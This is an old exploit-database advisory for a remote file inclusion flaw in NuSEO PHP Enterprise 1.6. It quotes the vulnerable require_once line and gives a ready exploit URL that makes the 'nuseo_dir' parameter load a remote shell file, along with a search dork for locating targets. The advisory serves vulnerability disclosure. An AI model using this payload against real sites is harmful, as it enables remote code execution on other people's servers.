nuseo PHP enterprise 1.6 - Remote File Inclusion

EDB-ID:

4512

Author:

BiNgZa

Type:

webapps

Platform:

PHP

Published:

2007-10-10

Vulnerability Type: Remote File Inclusion
Vulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.php
Exploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuseo_dir
Line number: 268
Lines:

----------------------------------------------

require_once( $nuseo_dir . '/nuseo' . '_d.php' );
//nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' );

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

FoUnD By BiNgZa

DoRk'SEO by NuSEO.PHP'

shadowcrew@hotmail.co.uk

shadow.php0h.com

# milw0rm.com [2007-10-10]